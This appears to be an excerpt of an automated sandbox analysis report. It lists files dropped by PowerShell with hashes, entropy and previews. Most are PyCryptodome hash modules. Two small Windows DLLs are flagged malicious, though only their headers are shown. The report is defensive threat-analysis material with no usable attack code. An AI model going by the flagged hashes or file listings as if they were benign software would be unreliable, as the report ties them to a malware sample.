                                                                                                                                                                                                            SSDEEP:12:1REYB3vIY36WHRypRyLXFL1AGRT7wPWA5AWLgRkhPWGaLBCYW4Ry5Ryn:1REcT36WxQEXFRAcuWAGWmkhPWGaLBVF
                                                                                                                                                                                                            MD5:8356FEEC109E4373A23F69FC01C115B5
                                                                                                                                                                                                            SHA1:9825E1FC90E13C9A265835684C57B22C92BD372C
                                                                                                                                                                                                            SHA-256:5699B054358A0C556096C132C09C8B3052E5EFE815A26EDABC5AD5E896BF8E9C
                                                                                                                                                                                                            SHA-512:F9612E9C137858ECC00F2F6CB2E6564CEE149A8ED978B5552FA6CD1E89061BF395B37A92351ECB594F0D47ADD925BB53DBC573654A523CEE4E2F2D2789AAE2E5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA3_512_Hash(object):.. digest_size: int.. block_size: int.. oid: str.. def __init__(self, data: Optional[Buffer], update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> SHA3_512_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA3_512_Hash: ..... def new(self, data: Optional[Buffer]) -> SHA3_512_Hash: .......def new(__data: Buffer = ..., update_after_digest: bool = ...) -> SHA3_512_Hash: .......digest_size: int..block_size: int..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7924
                                                                                                                                                                                                            Entropy (8bit):4.535718326603204
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:dFQHvo7HgkIpywpIreZOTiHSR2c+tTq0iR7IuqNH93aOMqXXVMrynCaK/WxUvxWy:bQHvjyEIqZOzYTq0iONdKUnYqGgRk
                                                                                                                                                                                                            MD5:F7EBB8B3E6EC44133C11F5B75F2AC0CF
                                                                                                                                                                                                            SHA1:4F0230A067019EF92DF555B66D7505BD6229E570
                                                                                                                                                                                                            SHA-256:F4346FEB42803D175A2B4CB2A45FE82882C426A67A64C12AC1D723268D3E7726
                                                                                                                                                                                                            SHA-512:B36AF52C1CD4EC732E1C3A7DB556BCCAF400C298416DE241C763153E784D101F11914D42FF1792513B54EDBBA2297BD49A0B2BEC91AC0AC180151C647F341FE0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):644
                                                                                                                                                                                                            Entropy (8bit):4.856785452609936
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYB3vIY3eRypRyLu1ApJREVwu5YgR4vORNJt0Ry5Ryn:1REcT3OQEWA1EnTcUNYwy
                                                                                                                                                                                                            MD5:B3762738614E6E1B46387BD0F80C1608
                                                                                                                                                                                                            SHA1:99293AED186FBBBF4D26C3E3A9198F2969596722
                                                                                                                                                                                                            SHA-256:BB0E0DF4F3FFFB4A2B9EFE5B674D7407BBD248678B0BF2A44FF0AA07D247DBDA
                                                                                                                                                                                                            SHA-512:E3B64DDF98F09B098B52AB79D69AF3827A483E4EDA33200B91F87BEB7E37E434D9CB75170635AE509F69D7F328F6B0A9ED258E42410265CE10B263B118C4521A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA512Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self,.. data: Optional[Buffer],.... truncate: Optional[str]) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA512Hash: ..... def new(self, data: Optional[Buffer] = ...) -> SHA512Hash: .......def new(data: Optional[Buffer] = ...,.. truncate: Optional[str] = ...) -> SHA512Hash: .....digest_size: int..block_size: int..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4890
                                                                                                                                                                                                            Entropy (8bit):4.812843153997009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:M7DqrYJALrYJHdt3EHGuIWHgkIl+zui+I4w+7nC/Y/slLH3I:4qrskrs9t3q/IwuiFGC/OOLY
                                                                                                                                                                                                            MD5:6D8138E2212AEA8C9815ABA5BEBD43D9
                                                                                                                                                                                                            SHA1:62A40C2E67FC652354E9A8B3126E77F9D759A174
                                                                                                                                                                                                            SHA-256:D4B807F0F64FE07BE95C7A7F40B4D35024C3A05770C942F9B25A8782B9DE90FB
                                                                                                                                                                                                            SHA-512:66DE5F2B988B9DD0A7D497B6BBBD2920859BC79A529A6200470B6EDB52D36BFEF55A2B51A0146BCC5B08FBDDD9529F9AFCEE1E2E8B86F1731BF6BAF90051484B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):450
                                                                                                                                                                                                            Entropy (8bit):4.960253129735369
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYB3vIY3wHVXFL1ApJR4QwEh72CX5BgR48OR42:1REcT36XFRA1Nh71m7U1
                                                                                                                                                                                                            MD5:1D2E126B0EA263236F02A5B62DA5903D
                                                                                                                                                                                                            SHA1:BCA2F2DC2A69380180FFEACDB276A6CA7FFD2036
                                                                                                                                                                                                            SHA-256:FCF71DFFB424435A46138D3B0377F30E1DB2AA318600D6DAE7B123DF848D3EA2
                                                                                                                                                                                                            SHA-512:4B806AABF25A8D9A705E282EB11EE73500BC1CF71A6EBE59A35A732DE1F5CA0D960BAC124059EF85AF9A6E5A2023895D7CDB195A884A8161275D9BE237F0A518
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHAKE128_XOF(object):.. oid: str.. def __init__(self,.. data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> SHAKE128_XOF: ..... def read(self, length: int) -> bytes: ..... def new(self, data: Optional[Buffer] = ...) -> SHAKE128_XOF: .......def new(data: Optional[Buffer] = ...) -> SHAKE128_XOF: .....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4892
                                                                                                                                                                                                            Entropy (8bit):4.816809610030539
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:M7DqrYJALrYJHdt3EHGuIWHgkIlHzPiPI7+7nC/Y/sl3nbI:4qrskrs9t3q/IZPiyGC/+O3M
                                                                                                                                                                                                            MD5:0B15BEEE639A9999E98C64F769F9133D
                                                                                                                                                                                                            SHA1:3D1366E4788CB51E655EC8C76AA3B7DB6FB98DF9
                                                                                                                                                                                                            SHA-256:3BE322B0801ABA422C870967EC82AF10958F370C944B3E6370EE8C2F7A1E7046
                                                                                                                                                                                                            SHA-512:B66693BFB0AAAD73F1BCEAE3DA2410EA53B3366734FDAC0985D7B0C0ACDC849BA98C2D9DA1A0C418FD1C9D757D9430C099F847E7E67B48443A3E55228ACFA0E1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):450
                                                                                                                                                                                                            Entropy (8bit):4.960253129735369
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYB3vIY3gHVXFL1ApJR4QwIh72CX5BgR4gOR4K:1REcT3g1XFRA1Rh71m/UZ
                                                                                                                                                                                                            MD5:7A030ACE3463C718EAA115B061D5E0CE
                                                                                                                                                                                                            SHA1:0525426CE1A9ABE207F53E953EA8E272E423D512
                                                                                                                                                                                                            SHA-256:5FF0C2256DD9F35EB7BF58D07EDC5A27E73173221079006B1AF95D0B114863A4
                                                                                                                                                                                                            SHA-512:230109D6EAC483A3DFA0E268477D860AF0DB445D89EF5E39B32A9833CC85E8FBD610C88993CABB097A60630620539191A6AC9742DAD3A7FA141600C7AC4603D5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHAKE256_XOF(object):.. oid: str.. def __init__(self,.. data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> SHAKE256_XOF: ..... def read(self, length: int) -> bytes: ..... def new(self, data: Optional[Buffer] = ...) -> SHAKE256_XOF: .......def new(data: Optional[Buffer] = ...) -> SHAKE256_XOF: .....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4888
                                                                                                                                                                                                            Entropy (8bit):5.0581555982839435
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:MMDqrYJALrYJHdt3EHGuIWHEnGLBx9RhHAygOAHbaIfoCIUCP9lVtpCj:Nqrskrs9t3q/ImHhzvfPoj
                                                                                                                                                                                                            MD5:386FB9A133C912AF07687FA9D1EE193A
                                                                                                                                                                                                            SHA1:FCA1900C47A573551C1EE74694CB0D374C7B20C7
                                                                                                                                                                                                            SHA-256:36051EA4794AA6687E689974F315CE9CE9620EC1F9B1AB4C2F0F9C8099D87BBF
                                                                                                                                                                                                            SHA-512:1A92C554CABE3DBF6A013E685D6FB919B47A39BF2429795CA87CEC1C15405F386644F141B79923B6B79833E15ABBA02A211FA939CBB0749888ACBD304AB2AE45
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):688
                                                                                                                                                                                                            Entropy (8bit):4.533807558794474
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYBzRo8seUvIY39cHRyD1AQ0dWRFwiOtC5J3r3/V039WgtcP33/RM33dWgtW:1REEyNT39oIAvdWtrj/VGif/qns
                                                                                                                                                                                                            MD5:19A89FFFB5E19D2A439870AA97B56DF2
                                                                                                                                                                                                            SHA1:32377BCB0660A03F28324C68EF03E94D0239A1DD
                                                                                                                                                                                                            SHA-256:B5671E5E8FC4513C2E0C9F072C1A9C868656F0CD66783DC011FC4556C1BD2306
                                                                                                                                                                                                            SHA-512:466932A02E76056468E12E1984DD3EA0DE44A3544DEA95F19723BE2EBBD9887D177AB7B3F75BAAA74E74D154C396DA468AA8F5492917599154EAEF04F3546B19
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Any, Union, List, Tuple..from types import ModuleType....Buffer = Union[bytes, bytearray, memoryview]....class TupleHash(object):.. digest_size: int.. def __init__(self,.... custom: bytes,.. cshake: ModuleType,.. digest_size: int) -> None: ..... def update(self, *data: Buffer) -> TupleHash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def new(self,... digest_bytes: int = ...,... digest_bits: int = ...,.. custom: int = ...) -> TupleHash: .......def new(digest_bytes: int = ...,... digest_bits: int = ...,.. custom: int = ...) -> TupleHash: .....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2902
                                                                                                                                                                                                            Entropy (8bit):5.194127497375906
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:MMWOqrYJALrYJHdG43tDs3EsIG13NcuIH2H9useGoCWxVGpYPGQ2IlstzSiwtpCj:MMDqrYJALrYJHdt3EHGuIWHdroCIUCPG
                                                                                                                                                                                                            MD5:CA7F63F5DC1A1059E168A5580E88B78B
                                                                                                                                                                                                            SHA1:4064F740C7E09083F8CF354BB24A56778D83D6A4
                                                                                                                                                                                                            SHA-256:96BB2970B54CC270DE193FB71155AFFBF54F9ACF21310AC4AD968893A478B3DF
                                                                                                                                                                                                            SHA-512:C259EF33FB4747529BF9496E3E78B9548279FDAE9BFE2E318FF8A7BFE13815500CBF4A31887A89D9DE21FFBB83897DCAC5F43AAA62C675A1A7473600B439BCCF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):149
                                                                                                                                                                                                            Entropy (8bit):4.609062935971047
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:1Lx7/NULQk8xNovSyrzcAiwZJysFTMCAW6wWfFKRiZJyFrIftZMFySJINfFDy:1Lx7/NULQXNoFrzcAx3ysRMhwWfsRi3s
                                                                                                                                                                                                            MD5:0C079EDD19DA6729069C7098599200CD
                                                                                                                                                                                                            SHA1:31985EE067F54DFCA6F334621CA9018D2A61DA15
                                                                                                                                                                                                            SHA-256:0B014A808207E4C2A6375DFD6ADE40C97B5802C8F9EA76748F333C1386C6704C
                                                                                                                                                                                                            SHA-512:5DFC7A622B54993F74F2848B595FDFCB33B63E43EDE31D384D4A635B179030EFC1222545607C8B816B90AC6FB273B8937B135F42B95AEB08AB906CF899027EB4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from .TupleHash128 import TupleHash....def new(digest_bytes: int = ...,... digest_bits: int = ...,.. custom: int = ...) -> TupleHash: .....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3947
                                                                                                                                                                                                            Entropy (8bit):4.323340706359232
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:+IlTHsKL8yk4PiQIXA+7nC/YlPAsAugmSfNZPqjp:bdiAGC/qAVAd
                                                                                                                                                                                                            MD5:B786224B4B79C69778DB52AC58F83E63
                                                                                                                                                                                                            SHA1:B2CCDF0809F838CFFF9C26D07857A01FE2F5AB8A
                                                                                                                                                                                                            SHA-256:512A0D196EFEDAB1E320041D54BFFBF7366C4D35EA95D7290732DB1FD8A946EA
                                                                                                                                                                                                            SHA-512:EA77F39AAC1E3EAB9966F45693591FE8F696929858D89329CB84B54D0C590A431C548188B003DF04DF513C3F33AFA2E67B30932CE5E981EF00A1B6B9D429BAD0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from Crypto.Util._raw_api import (VoidPointer, SmartPointer,.. create_string_buffer,.. get_raw_buffer, c_size_t,.. c_uint8_ptr, c_ubyte)....from Crypto.Util.number import long_to_bytes..from Crypto.Util.py3compat import bchr....from .keccak import _raw_keccak_lib......class TurboSHAKE(object):.. """A TurboSHAKE hash object... Do not instantiate directly... Use the :func:`new` function... """.... def __init__(self, capacity, domain_separation, data):.... state = VoidPointer().. result = _raw_keccak_lib.keccak_init(state.address_of(),.. c_size_t(capacity),.. c_ubyte(12)) # Reduced number of rounds.. if result:.. raise ValueError("Error %d while instantiating TurboSHAKE".. % result).. self._state = SmartPointer(state.get()
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):591
                                                                                                                                                                                                            Entropy (8bit):5.065116097079714
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYBlRE1B9YplvIY39fIL1AzvQ1aEeEWmodFwIiRh72CX5BgRE3GH1dmF:1REOC1bClT39fIRAqYi6LiRh71mEc1dA
                                                                                                                                                                                                            MD5:B0223AB14FDA42D6811F55259F9BE663
                                                                                                                                                                                                            SHA1:409E32782D3A86B66CEBABFA703D72BD682C069A
                                                                                                                                                                                                            SHA-256:B7617049D0B2131180EA0B73AE8CAC73839A27D394BE6B4D9796F9D0198DE6B7
                                                                                                                                                                                                            SHA-512:4A1180FD51BFE2A50EB344A19EFB954C5071218C169F14AC7A86D72BC45B946A35E7CDC4A06E616A20948F235D501AD24B113F2B9ABF56D68F4100F0C2DE8410
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, Optional..from typing_extensions import TypedDict, Unpack, NotRequired....Buffer = Union[bytes, bytearray, memoryview]....class TurboSHAKE(object):.... def __init__(self, capacity: int, domain_separation: int, data: Union[Buffer, None]) -> None: ..... def update(self, data: Buffer) -> TurboSHAKE : ..... def read(self, length: int) -> bytes: ..... def new(self, data: Optional[Buffer]=None) -> TurboSHAKE: .......class Args(TypedDict):.. domain: NotRequired[int].. data: NotRequired[Buffer]....def new(**kwargs: Unpack[Args]) -> TurboSHAKE: .....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):779
                                                                                                                                                                                                            Entropy (8bit):4.819439474706594
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1sumDc9v5Wb6SSkBXM6WhieoHvsPVEzmSqQeEFAcVG/Ebbj9jWAEsI:1sTDg5ESkOhNZPMmSq2FoM9jRI
                                                                                                                                                                                                            MD5:630FCFB160AFD4A4B095C35901777556
                                                                                                                                                                                                            SHA1:0F039C3A2C5205D2105A79B5EB2777884DC8E490
                                                                                                                                                                                                            SHA-256:AD79E152A2C83EE90AC61FF7245DF570673FBE28720D9DE8E07E2FDDBF0E51DB
                                                                                                                                                                                                            SHA-512:9ED88DA711066739EDB47EFB65755A57F9C18402A9AD5C112CF32BE13B97615C2C835A46C8E4E5CD89CBDB5EE6A9BE181A4CC42A1D6F4617F8AACB3C43F76878
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from .TurboSHAKE128 import TurboSHAKE....def new(**kwargs):.. """Create a new TurboSHAKE256 object..... Args:.. domain (integer):.. Optional - A domain separation byte, between 0x01 and 0x7F... The default value is 0x1F... data (bytes/bytearray/memoryview):.. Optional - The very first chunk of the message to hash... It is equivalent to an early call to :meth:`update`..... :Return: A :class:`TurboSHAKE` object.. """.... domain_separation = kwargs.get('domain', 0x1F).. if not (0x01 <= domain_separation <= 0x7F):.. raise ValueError("Incorrect domain separation value (%d)" %.. domain_separation).. data = kwargs.get('data').. return TurboSHAKE(64, domain_separation, data=data)..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):318
                                                                                                                                                                                                            Entropy (8bit):5.138819601387305
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:1REYBXa4REsuB9cebopy1LxyJQmUUzrIY3MT7O3ymK95lvdgzSNFIF:1REYBXa4RE1B9YSsumtvIY3eH1dmF
                                                                                                                                                                                                            MD5:0F8CE87AD72ECACADED5EB6869C0C063
                                                                                                                                                                                                            SHA1:4C8EBDA5C1826749B747BF268036DC11A1FD9CC3
                                                                                                                                                                                                            SHA-256:86DEA501F8ED56BAE7652415243B38845AB1C94A1E4AD0E737A98A37A80235EA
                                                                                                                                                                                                            SHA-512:8CD3AF34C3FD94E6DBE15575BB3AC6C84AFBAF14067066E53EEE3A727866C5E626E323C6ED4736186E21056D4A27EF57184DFAE378A9B8E53210F340051649ED
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union..from typing_extensions import TypedDict, Unpack, NotRequired....from .TurboSHAKE128 import TurboSHAKE....Buffer = Union[bytes, bytearray, memoryview]....class Args(TypedDict):.. domain: NotRequired[int].. data: NotRequired[Buffer]....def new(**kwargs: Unpack[Args]) -> TurboSHAKE: .....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12800
                                                                                                                                                                                                            Entropy (8bit):5.65350068977538
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:syi0PEXvICVhrQWujOQRVNMmrUC158cc/36UzxxbXMVnQ8N:sNgOr4jPVimrnz2368PmnQm
                                                                                                                                                                                                            MD5:D92AA7258E23AB3F184C8737AEA04413
                                                                                                                                                                                                            SHA1:6B3FD58F022100E26EC1DF2CECF5450090D2D09D
                                                                                                                                                                                                            SHA-256:F8EF44D4579651DB36E92F600C677EB19B5A6249202C882320D209B3E0586CB4
                                                                                                                                                                                                            SHA-512:754F01DA68F726B1E583C85B40C0DC965D0D6270BAEAD9B637E8981896FE22EA48DDE4B1AC53650C994CC0F0B1FBE9DED096251FC5D92876DDF38EC5F242652F
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........V.Q.8.Q.8.Q.8.X..U.8...9.S.8...9.R.8.Q.9.s.8...=.Z.8...<.[.8...;.P.8..0.P.8..8.P.8....P.8..:.P.8.RichQ.8.........................PE..L...X..f...........!................N........0...............................p............@..........................5.......6..d....P.......................`..T....1...............................1..@............0..x............................text............................... ..`.rdata.......0......."..............@..@.data........@.......,..............@....rsrc........P......................@..@.reloc..T....`.......0..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11264
                                                                                                                                                                                                            Entropy (8bit):5.5516561427459665
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:sbT0PEXvICVhTQWujOdXqoB3n7Nwl0tzVVQMVnQINY:sBgOT4jUXqmul0NPbnQS
                                                                                                                                                                                                            MD5:CC6306E4C4DB9845654286D38E0F815A
                                                                                                                                                                                                            SHA1:CB5AF219A58E65897A6F633024A87CF55E5020CF
                                                                                                                                                                                                            SHA-256:DAF65596E41C180AF748D66E467F401D84CCA0EFD6CDCEE14270F2F33CD2DDC7
                                                                                                                                                                                                            SHA-512:1AA15AB2EFA0FF39D34DF06FDEC539BA3722F2CE720C7425FD34E1BA408141BDEB21267BB23C95033B275E5B7B4867CC92AC404C2E61B8D9CDDFC5ECD52815C9
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........V.Q.8.Q.8.Q.8.X..U.8...9.S.8...9.R.8.Q.9.s.8...=.Z.8...<.[.8...;.P.8..0.P.8..8.P.8....P.8..:.P.8.RichQ.8.........................PE..L...Y..f...........!................N........0...............................p............@..........................5......L6..d....P.......................`..\....1...............................1..@............0..x............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc..\....`.......*..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
